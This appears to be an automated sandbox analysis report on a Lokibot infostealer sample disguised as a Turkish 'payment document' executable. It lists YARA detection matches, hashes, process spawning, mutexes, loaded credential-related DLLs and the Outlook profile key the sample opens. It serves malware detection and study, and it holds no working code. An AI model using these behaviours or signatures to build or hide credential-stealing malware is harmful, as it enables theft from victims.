            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF74710_2_04FF7471
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF05E80_2_04FF05E8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF05D80_2_04FF05D8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF96F00_2_04FF96F0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF96E00_2_04FF96E0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF87F80_2_04FF87F8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF67E00_2_04FF67E0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFA0EA0_2_04FFA0EA
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFF1980_2_04FFF198
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF1C580_2_04FF1C58
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF1C4B0_2_04FF1C4B
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFAE300_2_04FFAE30
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFAE220_2_04FFAE22
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFAFE80_2_04FFAFE8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF6FE00_2_04FF6FE0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFBF480_2_04FFBF48
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFF8E80_2_04FFF8E8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF18100_2_04FF1810
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF18000_2_04FF1800
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFA9680_2_04FFA968
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFA95A0_2_04FFA95A
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFEAE00_2_04FFEAE0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF1A180_2_04FF1A18
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF1A080_2_04FF1A08
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFABB80_2_04FFABB8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FFABA80_2_04FFABA8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6EC6580_2_0A6EC658
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E2D520_2_0A6E2D52
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E25D80_2_0A6E25D8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED9580_2_0A6ED958
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6EC64F0_2_0A6EC64F
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E1E290_2_0A6E1E29
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E1E380_2_0A6E1E38
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E84580_2_0A6E8458
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6EB5300_2_0A6EB530
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_0040549C1_2_0040549C
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_004029D41_2_004029D4
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: String function: 00405B6F appears 42 times
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80
            Source: Odeme_belgesi.exe, 00000000.00000002.1680393686.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Odeme_belgesi.exe
            Source: Odeme_belgesi.exe, 00000000.00000002.1692289357.000000000DBBA000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameserver1.exe: vs Odeme_belgesi.exe
            Source: Odeme_belgesi.exe, 00000000.00000000.1665120062.0000000000632000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameserver1.exe: vs Odeme_belgesi.exe
            Source: Odeme_belgesi.exeBinary or memory string: OriginalFilenameserver1.exe: vs Odeme_belgesi.exe
            Source: Odeme_belgesi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Odeme_belgesi.exeStatic PE information: Section: pNld"O ZLIB complexity 1.0003274877265862
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@3/1
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,1_2_0040434D
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Odeme_belgesi.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7128
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\fe982138-f3da-4d31-99ef-675c1f388bd3Jump to behavior
            Source: Odeme_belgesi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Odeme_belgesi.exeReversingLabs: Detection: 55%
            Source: unknownProcess created: C:\Users\user\Desktop\Odeme_belgesi.exe "C:\Users\user\Desktop\Odeme_belgesi.exe"
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exeJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exeJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: Odeme_belgesi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Odeme_belgesi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeUnpacked PE file: 0.2.Odeme_belgesi.exe.5d0000.0.unpack pNld"O:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
            Source: Yara matchFile source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTR
            Source: Odeme_belgesi.exeStatic PE information: section name: pNld"O
            Source: Odeme_belgesi.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E2AF0 pushad ; ret 0_2_0A6E2AF1
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E9BBF push 8BFFFFFFh; retf 0_2_0A6E9BC5
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6E31D0 pushad ; retf 0_2_0A6E31D1
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
            Source: Odeme_belgesi.exeStatic PE information: section name: pNld"O entropy: 7.999478956820455
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
